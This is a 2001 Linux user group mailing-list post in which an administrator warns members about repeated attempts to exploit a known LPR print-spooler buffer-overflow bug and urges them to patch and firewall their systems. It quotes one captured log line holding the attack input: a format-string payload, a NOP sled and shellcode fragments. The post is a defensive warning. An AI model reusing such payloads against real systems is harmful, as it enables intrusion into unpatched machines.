[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Important SECURITY Information - READ CAREFULLY

To: KLUG <members@xxxxxxxxxxxxxxxxxx>
Subject: Important SECURITY Information - READ CAREFULLY
From: Bruce Smith <bruce@xxxxxxxxxxx>
Date: Mon, 09 Apr 2001 21:52:14 -0400
Sender: bruce@xxxxxxxxxxxxx

I was online from home last night, and noticed *972* new entries 
in my /var/log/messages similar to the following one:

-------------------------------------------------------------------------------
Apr  8 17:29:43 pc1h SERVER[7596]: Dispatch_input: bad request line 'BB<DC><F3>
<FF><BF><DD><F3><FF><BF><DE><F3><FF><BF><DF><F3><FF><BF>XXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2201<DB>1<C9>1<C0><B0>F<CD>\200\211<E5>1<D2><B2>f\211<D0>1<C9>\211<CB>C!
\211]<F8>C\211]<F4>K\211M<FC>\215M<F4><CD>\2001
<C9>\211
-------------------------------------------------------------------------------

PID 7596 was not running, and not knowing what the process 
"SERVER" was, I was puzzled for awhile.

After a little research, I found that "SERVER" is the print
spooler, and someone tried to CRACK my system by exploiting
a known buffer overflow bug in LPR !!!!!!
  http://www.redhat.com/support/errata/RHSA-2000-065.html

I was never so glad that I keep my system updated with the
latest errata in my life!!!

So, if you think you're safe with a dialup connection and
a random IP address, think again!!!  I dial up from home 
and connect with a random IP address!

It's definitely worth the time to keep your system updated
and to setup a firewall.  If you haven't, and do it NOW!
There have been a lot of security advisories lately, like
a really nasty NTP bug found a few days ago.  (a last
minute addition to this week's BSware)

I really didn't plan this as a plug for the upcoming KLUG
presentations on security, but it is rather timely.  A
perfect opportunity for you to learn about Linux security!

--------------------------------------------
Bruce Smith                bruce@armintl.com
System Administrator / Network Administrator
Armstrong International, Inc.
Three Rivers, Michigan  49093  USA
http://www.armstrong-intl.com/
--------------------------------------------

Follow-Ups:
- Re: Important SECURITY Information - READ CAREFULLY
  - From: Richard Zimmerman

Prev by Date: Re: LINK OFTHE WEEK
Next by Date: Security Enhanced Linux
Prev by thread: Re: LINK OFTHE WEEK
Next by thread: Re: Important SECURITY Information - READ CAREFULLY
Index(es):
- Date
- Thread